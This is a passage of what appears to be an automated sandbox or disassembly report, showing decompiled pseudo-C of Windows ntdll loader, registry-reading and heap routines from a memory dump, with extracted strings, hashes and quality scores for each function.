                                                                                      										E01835510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                                      										_t81 =  *0x18a5780; // 0x0
                                                                                      									}
                                                                                      									__eflags = _t81 & 0x00000010;
                                                                                      									if((_t81 & 0x00000010) != 0) {
                                                                                      										asm("int3");
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t159 = E017C849B(0, _t122, _t153, _t159, _t180);
                                                                                      							if(_t159 >= 0) {
                                                                                      								goto L6;
                                                                                      							}
                                                                                      						}
                                                                                      						_t80 = _t159;
                                                                                      						goto L8;
                                                                                      					} else {
                                                                                      						_t125 = 0x13;
                                                                                      						asm("int 0x29");
                                                                                      						_push(0);
                                                                                      						_push(_t159);
                                                                                      						_t161 = _t125;
                                                                                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                                      						_t143 = 0;
                                                                                      						_v40 = _t161;
                                                                                      						_t118 = 0;
                                                                                      						_push(_t153);
                                                                                      						__eflags = _t87;
                                                                                      						if(_t87 != 0) {
                                                                                      							_t118 = _t87 + 0x5d8;
                                                                                      							__eflags = _t118;
                                                                                      							if(_t118 == 0) {
                                                                                      								L46:
                                                                                      								_t118 = 0;
                                                                                      							} else {
                                                                                      								__eflags =  *(_t118 + 0x30);
                                                                                      								if( *(_t118 + 0x30) == 0) {
                                                                                      									goto L46;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						_v32 = 0;
                                                                                      						_v28 = 0;
                                                                                      						_v16 = 0;
                                                                                      						_v20 = 0;
                                                                                      						_v12 = 0;
                                                                                      						__eflags = _t118;
                                                                                      						if(_t118 != 0) {
                                                                                      							__eflags = _t161;
                                                                                      							if(_t161 != 0) {
                                                                                      								__eflags =  *(_t118 + 8);
                                                                                      								if( *(_t118 + 8) == 0) {
                                                                                      									L22:
                                                                                      									_t143 = 1;
                                                                                      									__eflags = 1;
                                                                                      								} else {
                                                                                      									_t19 = _t118 + 0x40; // 0x40
                                                                                      									_t156 = _t19;
                                                                                      									E017C8999(_t19,  &_v16);
                                                                                      									__eflags = _v0;
                                                                                      									if(_v0 != 0) {
                                                                                      										__eflags = _v0 - 1;
                                                                                      										if(_v0 != 1) {
                                                                                      											goto L22;
                                                                                      										} else {
                                                                                      											_t128 =  *(_t161 + 0x64);
                                                                                      											__eflags =  *(_t161 + 0x64);
                                                                                      											if( *(_t161 + 0x64) == 0) {
                                                                                      												goto L22;
                                                                                      											} else {
                                                                                      												E017C8999(_t128,  &_v12);
                                                                                      												_t147 = _v12;
                                                                                      												_t91 = 0;
                                                                                      												__eflags = 0;
                                                                                      												_t129 =  *_t147;
                                                                                      												while(1) {
                                                                                      													__eflags =  *((intOrPtr*)(0x18a5c60 + _t91 * 8)) - _t129;
                                                                                      													if( *((intOrPtr*)(0x18a5c60 + _t91 * 8)) == _t129) {
                                                                                      														break;
                                                                                      													}
                                                                                      													_t91 = _t91 + 1;
                                                                                      													__eflags = _t91 - 5;
                                                                                      													if(_t91 < 5) {
                                                                                      														continue;
                                                                                      													} else {
                                                                                      														_t131 = 0;
                                                                                      														__eflags = 0;
                                                                                      													}
                                                                                      													L37:
                                                                                      													__eflags = _t131;
                                                                                      													if(_t131 != 0) {
                                                                                      														goto L22;
                                                                                      													} else {
                                                                                      														__eflags = _v16 - _t147;
                                                                                      														if(_v16 != _t147) {
                                                                                      															goto L22;
                                                                                      														} else {
                                                                                      															E017D2280(_t92, 0x18a86cc);
                                                                                      															_t94 = E01889DFB( &_v20);
                                                                                      															__eflags = _t94 - 1;
                                                                                      															if(_t94 != 1) {
                                                                                      															}
                                                                                      															asm("movsd");
                                                                                      															asm("movsd");
                                                                                      															asm("movsd");
                                                                                      															asm("movsd");
                                                                                      															 *_t118 =  *_t118 + 1;
                                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                                      															_t95 = E017E61A0( &_v32);
                                                                                      															__eflags = _t95;
                                                                                      															if(_t95 != 0) {
                                                                                      																__eflags = _v32 | _v28;
                                                                                      																if((_v32 | _v28) != 0) {
                                                                                      																	_t71 = _t118 + 0x40; // 0x3f
                                                                                      																	_t134 = _t71;
                                                                                      																	goto L55;
                                                                                      																}
                                                                                      															}
                                                                                      															goto L30;
                                                                                      														}
                                                                                      													}
                                                                                      													goto L56;
                                                                                      												}
                                                                                      												_t92 = 0x18a5c64 + _t91 * 8;
                                                                                      												asm("lock xadd [eax], ecx");
                                                                                      												_t131 = (_t129 | 0xffffffff) - 1;
                                                                                      												goto L37;
                                                                                      											}
                                                                                      										}
                                                                                      										goto L56;
                                                                                      									} else {
                                                                                      										_t143 = E017C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                                      										__eflags = _t143;
                                                                                      										if(_t143 != 0) {
                                                                                      											_t157 = _v12;
                                                                                      											_t103 = 0;
                                                                                      											__eflags = 0;
                                                                                      											_t136 =  &(_t157[1]);
                                                                                      											 *(_t161 + 0x64) = _t136;
                                                                                      											_t151 =  *_t157;
                                                                                      											_v20 = _t136;
                                                                                      											while(1) {
                                                                                      												__eflags =  *((intOrPtr*)(0x18a5c60 + _t103 * 8)) - _t151;
                                                                                      												if( *((intOrPtr*)(0x18a5c60 + _t103 * 8)) == _t151) {
                                                                                      													break;
                                                                                      												}
                                                                                      												_t103 = _t103 + 1;
                                                                                      												__eflags = _t103 - 5;
                                                                                      												if(_t103 < 5) {
                                                                                      													continue;
                                                                                      												}
                                                                                      												L21:
                                                                                      												_t105 = E017FF380(_t136, 0x1791184, 0x10);
                                                                                      												__eflags = _t105;
                                                                                      												if(_t105 != 0) {
                                                                                      													__eflags =  *_t157 -  *_v16;
                                                                                      													if( *_t157 >=  *_v16) {
                                                                                      														goto L22;
                                                                                      													} else {
                                                                                      														asm("cdq");
                                                                                      														_t166 = _t157[5] & 0x0000ffff;
                                                                                      														_t108 = _t157[5] & 0x0000ffff;
                                                                                      														asm("cdq");
                                                                                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                                      														if(__eflags > 0) {
                                                                                      															L29:
                                                                                      															E017D2280(_t108, 0x18a86cc);
                                                                                      															 *_t118 =  *_t118 + 1;
                                                                                      															_t42 = _t118 + 0x40; // 0x3f
                                                                                      															_t156 = _t42;
                                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                                      															asm("movsd");
                                                                                      															asm("movsd");
                                                                                      															asm("movsd");
                                                                                      															asm("movsd");
                                                                                      															_t110 = E017E61A0( &_v32);
                                                                                      															__eflags = _t110;
                                                                                      															if(_t110 != 0) {
                                                                                      																__eflags = _v32 | _v28;
                                                                                      																if((_v32 | _v28) != 0) {
                                                                                      																	_t134 = _v20;
                                                                                      																	L55:
                                                                                      																	E01889D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                                      																}
                                                                                      															}
                                                                                      															L30:
                                                                                      															 *_t118 =  *_t118 + 1;
                                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                                      															E017CFFB0(_t118, _t156, 0x18a86cc);
                                                                                      															goto L22;
                                                                                      														} else {
                                                                                      															if(__eflags < 0) {
                                                                                      																goto L22;
                                                                                      															} else {
                                                                                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                                      																	goto L22;
                                                                                      																} else {
                                                                                      																	goto L29;
                                                                                      																}
                                                                                      															}
                                                                                      														}
                                                                                      													}
                                                                                      													goto L56;
                                                                                      												}
                                                                                      												goto L22;
                                                                                      											}
                                                                                      											asm("lock inc dword [eax]");
                                                                                      											goto L21;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						return _t143;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_push( &_v8);
                                                                                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                                      					_push(__ecx + 0x40);
                                                                                      					_push(_t121);
                                                                                      					_push(0xffffffff);
                                                                                      					_t80 = E017F9A00();
                                                                                      					_t159 = _t80;
                                                                                      					if(_t159 < 0) {
                                                                                      						L8:
                                                                                      						return _t80;
                                                                                      					} else {
                                                                                      						goto L2;
                                                                                      					}
                                                                                      				}
                                                                                      				L56:
                                                                                      			}


                                                                                      Strings
                                                                                      • LdrpDoPostSnapWork, xrefs: 01819C1E
                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 01819C28
                                                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01819C18
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 2994545307-1948996284
                                                                                      • Opcode ID: 67d8f0050148db335afcd89483e926783e6318abc357f5a835ce1512b80e29b7
                                                                                      • Instruction ID: 117da58df9a9ad3474dad248b5936f2e5eb33eb4a1a60fe0d9fd425cbf693348
                                                                                      • Opcode Fuzzy Hash: 67d8f0050148db335afcd89483e926783e6318abc357f5a835ce1512b80e29b7
                                                                                      • Instruction Fuzzy Hash: 7A911371A002069BEF18DF59D880ABAF7F5FF44B14B45406DEA05AB645EB30EA41CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E017C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                      				char _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				char _v24;
                                                                                      				signed int _t73;
                                                                                      				void* _t77;
                                                                                      				char* _t82;
                                                                                      				char* _t87;
                                                                                      				signed char* _t97;
                                                                                      				signed char _t102;
                                                                                      				intOrPtr _t107;
                                                                                      				signed char* _t108;
                                                                                      				intOrPtr _t112;
                                                                                      				intOrPtr _t124;
                                                                                      				intOrPtr _t125;
                                                                                      				intOrPtr _t126;
                                                                                      
                                                                                      				_t107 = __edx;
                                                                                      				_v12 = __ecx;
                                                                                      				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                      				_t124 = 0;
                                                                                      				_v20 = __edx;
                                                                                      				if(E017CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                                      					_t112 = _v8;
                                                                                      				} else {
                                                                                      					_t112 = 0;
                                                                                      					_v8 = 0;
                                                                                      				}
                                                                                      				if(_t112 != 0) {
                                                                                      					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                                      						_t124 = 0xc000007b;
                                                                                      						goto L8;
                                                                                      					}
                                                                                      					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                                      					 *(_t125 + 0x34) = _t73;
                                                                                      					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                                      						goto L3;
                                                                                      					}
                                                                                      					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                                      					_t124 = E017BC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                                      					if(_t124 < 0) {
                                                                                      						goto L8;
                                                                                      					} else {
                                                                                      						goto L3;
                                                                                      					}
                                                                                      				} else {
                                                                                      					L3:
                                                                                      					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                                      						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                                      						L8:
                                                                                      						return _t124;
                                                                                      					}
                                                                                      					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                                      						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                                      							goto L5;
                                                                                      						}
                                                                                      						_t102 =  *0x18a5780; // 0x0
                                                                                      						if((_t102 & 0x00000003) != 0) {
                                                                                      							E01835510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                                      							_t102 =  *0x18a5780; // 0x0
                                                                                      						}
                                                                                      						if((_t102 & 0x00000010) != 0) {
                                                                                      							asm("int3");
                                                                                      						}
                                                                                      						_t124 = 0xc0000428;
                                                                                      						goto L8;
                                                                                      					}
                                                                                      					L5:
                                                                                      					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                                      						goto L8;
                                                                                      					}
                                                                                      					_t77 = _a4 - 0x40000003;
                                                                                      					if(_t77 == 0 || _t77 == 0x33) {
                                                                                      						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                      						if(E017D7D50() != 0) {
                                                                                      							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                      						} else {
                                                                                      							_t82 = 0x7ffe0384;
                                                                                      						}
                                                                                      						_t108 = 0x7ffe0385;
                                                                                      						if( *_t82 != 0) {
                                                                                      							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                      								if(E017D7D50() == 0) {
                                                                                      									_t97 = 0x7ffe0385;
                                                                                      								} else {
                                                                                      									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                      								}
                                                                                      								if(( *_t97 & 0x00000020) != 0) {
                                                                                      									E01837016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						if(_a4 != 0x40000003) {
                                                                                      							L14:
                                                                                      							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                      							if(E017D7D50() != 0) {
                                                                                      								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                      							} else {
                                                                                      								_t87 = 0x7ffe0384;
                                                                                      							}
                                                                                      							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                      								if(E017D7D50() != 0) {
                                                                                      									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                      								}
                                                                                      								if(( *_t108 & 0x00000020) != 0) {
                                                                                      									E01837016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                                      								}
                                                                                      							}
                                                                                      							goto L8;
                                                                                      						} else {
                                                                                      							_v16 = _t125 + 0x24;
                                                                                      							_t124 = E017EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                                      							if(_t124 < 0) {
                                                                                      								E017BB1E1(_t124, 0x1490, 0, _v16);
                                                                                      								goto L8;
                                                                                      							}
                                                                                      							goto L14;
                                                                                      						}
                                                                                      					} else {
                                                                                      						goto L8;
                                                                                      					}
                                                                                      				}
                                                                                      			}





















                                                                                      Strings
                                                                                      • LdrpCompleteMapModule, xrefs: 01819898
                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 018198A2
                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 01819891
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                      • API String ID: 0-1676968949
                                                                                      • Opcode ID: 400d5d7eb3437389740a9cb8894d999b1beac20f28163ac0ec634ed076189495
                                                                                      • Instruction ID: 00cd56f7958c6ebc15b12a4ae2481f22e6476fcfe30a48ff9b0deef4f28dd3ef
                                                                                      • Opcode Fuzzy Hash: 400d5d7eb3437389740a9cb8894d999b1beac20f28163ac0ec634ed076189495
                                                                                      • Instruction Fuzzy Hash: DB51F332A007469BEB29CB5DC854B2AFBE4AB05B18F44069DED51DB3D5CB30EA40CF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 93%
                                                                                      			E017BE620(void* __ecx, short* __edx, short* _a4) {
                                                                                      				char _v16;
                                                                                      				char _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				char* _v28;
                                                                                      				char _v32;
                                                                                      				char _v36;
                                                                                      				char _v44;
                                                                                      				signed int _v48;
                                                                                      				intOrPtr _v52;
                                                                                      				void* _v56;
                                                                                      				void* _v60;
                                                                                      				char _v64;
                                                                                      				void* _v68;
                                                                                      				void* _v76;
                                                                                      				void* _v84;
                                                                                      				signed int _t59;
                                                                                      				signed int _t74;
                                                                                      				signed short* _t75;
                                                                                      				signed int _t76;
                                                                                      				signed short* _t78;
                                                                                      				signed int _t83;
                                                                                      				short* _t93;
                                                                                      				signed short* _t94;
                                                                                      				short* _t96;
                                                                                      				void* _t97;
                                                                                      				signed int _t99;
                                                                                      				void* _t101;
                                                                                      				void* _t102;
                                                                                      
                                                                                      				_t80 = __ecx;
                                                                                      				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                                      				_t96 = __edx;
                                                                                      				_v44 = __edx;
                                                                                      				_t78 = 0;
                                                                                      				_v56 = 0;
                                                                                      				if(__ecx == 0 || __edx == 0) {
                                                                                      					L28:
                                                                                      					_t97 = 0xc000000d;
                                                                                      				} else {
                                                                                      					_t93 = _a4;
                                                                                      					if(_t93 == 0) {
                                                                                      						goto L28;
                                                                                      					}
                                                                                      					_t78 = E017BF358(__ecx, 0xac);
                                                                                      					if(_t78 == 0) {
                                                                                      						_t97 = 0xc0000017;
                                                                                      						L6:
                                                                                      						if(_v56 != 0) {
                                                                                      							_push(_v56);
                                                                                      							E017F95D0();
                                                                                      						}
                                                                                      						if(_t78 != 0) {
                                                                                      							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                                      						}
                                                                                      						return _t97;
                                                                                      					}
                                                                                      					E017FFA60(_t78, 0, 0x158);
                                                                                      					_v48 = _v48 & 0x00000000;
                                                                                      					_t102 = _t101 + 0xc;
                                                                                      					 *_t96 = 0;
                                                                                      					 *_t93 = 0;
                                                                                      					E017FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                                      					_v36 = 0x18;
                                                                                      					_v28 =  &_v44;
                                                                                      					_v64 = 0;
                                                                                      					_push( &_v36);
                                                                                      					_push(0x20019);
                                                                                      					_v32 = 0;
                                                                                      					_push( &_v64);
                                                                                      					_v24 = 0x40;
                                                                                      					_v20 = 0;
                                                                                      					_v16 = 0;
                                                                                      					_t97 = E017F9600();
                                                                                      					if(_t97 < 0) {
                                                                                      						goto L6;
                                                                                      					}
                                                                                      					E017FBB40(0,  &_v36, L"InstallLanguageFallback");
                                                                                      					_push(0);
                                                                                      					_v48 = 4;
                                                                                      					_t97 = L017BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                                      					if(_t97 >= 0) {
                                                                                      						if(_v52 != 1) {
                                                                                      							L17:
                                                                                      							_t97 = 0xc0000001;
                                                                                      							goto L6;
                                                                                      						}
                                                                                      						_t59 =  *_t78 & 0x0000ffff;
                                                                                      						_t94 = _t78;
                                                                                      						_t83 = _t59;
                                                                                      						if(_t59 == 0) {
                                                                                      							L19:
                                                                                      							if(_t83 == 0) {
                                                                                      								L23:
                                                                                      								E017FBB40(_t83, _t102 + 0x24, _t78);
                                                                                      								if(L017C43C0( &_v48,  &_v64) == 0) {
                                                                                      									goto L17;
                                                                                      								}
                                                                                      								_t84 = _v48;
                                                                                      								 *_v48 = _v56;
                                                                                      								if( *_t94 != 0) {
                                                                                      									E017FBB40(_t84, _t102 + 0x24, _t94);
                                                                                      									if(L017C43C0( &_v48,  &_v64) != 0) {
                                                                                      										 *_a4 = _v56;
                                                                                      									} else {
                                                                                      										_t97 = 0xc0000001;
                                                                                      										 *_v48 = 0;
                                                                                      									}
                                                                                      								}
                                                                                      								goto L6;
                                                                                      							}
                                                                                      							_t83 = _t83 & 0x0000ffff;
                                                                                      							while(_t83 == 0x20) {
                                                                                      								_t94 =  &(_t94[1]);
                                                                                      								_t74 =  *_t94 & 0x0000ffff;
                                                                                      								_t83 = _t74;
                                                                                      								if(_t74 != 0) {
                                                                                      									continue;
                                                                                      								}
                                                                                      								goto L23;
                                                                                      							}
                                                                                      							goto L23;
                                                                                      						} else {
                                                                                      							goto L14;
                                                                                      						}
                                                                                      						while(1) {
                                                                                      							L14:
                                                                                      							_t27 =  &(_t94[1]); // 0x2
                                                                                      							_t75 = _t27;
                                                                                      							if(_t83 == 0x2c) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t94 = _t75;
                                                                                      							_t76 =  *_t94 & 0x0000ffff;
                                                                                      							_t83 = _t76;
                                                                                      							if(_t76 != 0) {
                                                                                      								continue;
                                                                                      							}
                                                                                      							goto L23;
                                                                                      						}
                                                                                      						 *_t94 = 0;
                                                                                      						_t94 = _t75;
                                                                                      						_t83 =  *_t75 & 0x0000ffff;
                                                                                      						goto L19;
                                                                                      					}
                                                                                      				}
                                                                                      			}


                                                                                      Strings
                                                                                      • InstallLanguageFallback, xrefs: 017BE6DB
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 017BE68C
                                                                                      • @, xrefs: 017BE6C0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                      • API String ID: 0-1757540487
                                                                                      • Opcode ID: 4c747d8ef2faa26b152b7d66ce0fc0ab720cc4df2f069424ff2d571a84e8579a
                                                                                      • Instruction ID: 1fa2028a6c33da0c5ba513b17937188640451e98349334476eff680da98cbe9b
                                                                                      • Opcode Fuzzy Hash: 4c747d8ef2faa26b152b7d66ce0fc0ab720cc4df2f069424ff2d571a84e8579a
                                                                                      • Instruction Fuzzy Hash: B851A2B25083069BD710DF68C484BABF7E8AF89714F05092EFA85D7344EB34DA04C792
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 60%
                                                                                      			E0187E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                                      				signed int _v20;
                                                                                      				char _v24;
                                                                                      				signed int _v40;
                                                                                      				char _v44;
                                                                                      				intOrPtr _v48;
                                                                                      				signed int _v52;
                                                                                      				unsigned int _v56;
                                                                                      				char _v60;
                                                                                      				signed int _v64;
                                                                                      				char _v68;
                                                                                      				signed int _v72;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				char _t87;
                                                                                      				signed int _t90;
                                                                                      				signed int _t94;
                                                                                      				signed int _t100;
                                                                                      				intOrPtr* _t113;
                                                                                      				signed int _t122;
                                                                                      				void* _t132;
                                                                                      				void* _t135;
                                                                                      				signed int _t139;
                                                                                      				signed int* _t141;
                                                                                      				signed int _t146;
                                                                                      				signed int _t147;
                                                                                      				void* _t153;
                                                                                      				signed int _t155;
                                                                                      				signed int _t159;
                                                                                      				char _t166;
                                                                                      				void* _t172;
                                                                                      				void* _t176;
                                                                                      				signed int _t177;
                                                                                      				intOrPtr* _t179;
                                                                                      
                                                                                      				_t179 = __ecx;
                                                                                      				_v48 = __edx;
                                                                                      				_v68 = 0;
                                                                                      				_v72 = 0;
                                                                                      				_push(__ecx[1]);
                                                                                      				_push( *__ecx);
                                                                                      				_push(0);
                                                                                      				_t153 = 0x14;
                                                                                      				_t135 = _t153;
                                                                                      				_t132 = E0187BBBB(_t135, _t153);
                                                                                      				if(_t132 == 0) {
                                                                                      					_t166 = _v68;
                                                                                      					goto L43;
                                                                                      				} else {
                                                                                      					_t155 = 0;
                                                                                      					_v52 = 0;
                                                                                      					asm("stosd");
                                                                                      					asm("stosd");
                                                                                      					asm("stosd");
                                                                                      					asm("stosd");
                                                                                      					asm("stosd");
                                                                                      					_v56 = __ecx[1];
                                                                                      					if( *__ecx >> 8 < 2) {
                                                                                      						_t155 = 1;
                                                                                      						_v52 = 1;
                                                                                      					}
                                                                                      					_t139 = _a4;
                                                                                      					_t87 = (_t155 << 0xc) + _t139;
                                                                                      					_v60 = _t87;
                                                                                      					if(_t87 < _t139) {
                                                                                      						L11:
                                                                                      						_t166 = _v68;
                                                                                      						L12:
                                                                                      						if(_t132 != 0) {
                                                                                      							E0187BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                                      						}
                                                                                      						L43:
                                                                                      						if(_v72 != 0) {
                                                                                      							_push( *((intOrPtr*)(_t179 + 4)));
                                                                                      							_push( *_t179);
                                                                                      							_push(0x8000);
                                                                                      							E0187AFDE( &_v72,  &_v60);
                                                                                      						}
                                                                                      						L46:
                                                                                      						return _t166;
                                                                                      					}
                                                                                      					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                                      					asm("sbb edi, edi");
                                                                                      					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                                      					if(_t90 != 0) {
                                                                                      						_push(0);
                                                                                      						_push(0x14);
                                                                                      						_push( &_v44);
                                                                                      						_push(3);
                                                                                      						_push(_t179);
                                                                                      						_push(0xffffffff);
                                                                                      						if(E017F9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                                      							_push(_t139);
                                                                                      							E0187A80D(_t179, 1, _v40, 0);
                                                                                      							_t172 = 4;
                                                                                      						}
                                                                                      					}
                                                                                      					_t141 =  &_v72;
                                                                                      					if(E0187A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                                      						_v64 = _a4;
                                                                                      						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                                      						asm("sbb edi, edi");
                                                                                      						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                                      						if(_t94 != 0) {
                                                                                      							_push(0);
                                                                                      							_push(0x14);
                                                                                      							_push( &_v24);
                                                                                      							_push(3);
                                                                                      							_push(_t179);
                                                                                      							_push(0xffffffff);
                                                                                      							if(E017F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                                      								_push(_t141);
                                                                                      								E0187A80D(_t179, 1, _v20, 0);
                                                                                      								_t176 = 4;
                                                                                      							}
                                                                                      						}
                                                                                      						if(E0187A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                                      							goto L11;
                                                                                      						} else {
                                                                                      							_t177 = _v64;
                                                                                      							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                                      							_t100 = _v52 + _v52;
                                                                                      							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                                      							 *(_t132 + 0x10) = _t146;
                                                                                      							asm("bsf eax, [esp+0x18]");
                                                                                      							_v52 = _t100;
                                                                                      							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                                      							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                                      							_t47 =  &_a8;
                                                                                      							 *_t47 = _a8 & 0x00000001;
                                                                                      							if( *_t47 == 0) {
                                                                                      								E017D2280(_t179 + 0x30, _t179 + 0x30);
                                                                                      							}
                                                                                      							_t147 =  *(_t179 + 0x34);
                                                                                      							_t159 =  *(_t179 + 0x38) & 1;
                                                                                      							_v68 = 0;
                                                                                      							if(_t147 == 0) {
                                                                                      								L35:
                                                                                      								E017CB090(_t179 + 0x34, _t147, _v68, _t132);
                                                                                      								if(_a8 == 0) {
                                                                                      									E017CFFB0(_t132, _t177, _t179 + 0x30);
                                                                                      								}
                                                                                      								asm("lock xadd [eax], ecx");
                                                                                      								asm("lock xadd [eax], edx");
                                                                                      								_t132 = 0;
                                                                                      								_v72 = _v72 & 0;
                                                                                      								_v68 = _v72;
                                                                                      								if(E017D7D50() == 0) {
                                                                                      									_t113 = 0x7ffe0388;
                                                                                      								} else {
                                                                                      									_t177 = _v64;
                                                                                      									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                      								}
                                                                                      								if( *_t113 == _t132) {
                                                                                      									_t166 = _v68;
                                                                                      									goto L46;
                                                                                      								} else {
                                                                                      									_t166 = _v68;
                                                                                      									E0186FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                                      									goto L12;
                                                                                      								}
                                                                                      							} else {
                                                                                      								L23:
                                                                                      								while(1) {
                                                                                      									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                                      										_t122 =  *_t147;
                                                                                      										if(_t159 == 0) {
                                                                                      											L32:
                                                                                      											if(_t122 == 0) {
                                                                                      												L34:
                                                                                      												_v68 = 0;
                                                                                      												goto L35;
                                                                                      											}
                                                                                      											L33:
                                                                                      											_t147 = _t122;
                                                                                      											continue;
                                                                                      										}
                                                                                      										if(_t122 == 0) {
                                                                                      											goto L34;
                                                                                      										}
                                                                                      										_t122 = _t122 ^ _t147;
                                                                                      										goto L32;
                                                                                      									}
                                                                                      									_t122 =  *(_t147 + 4);
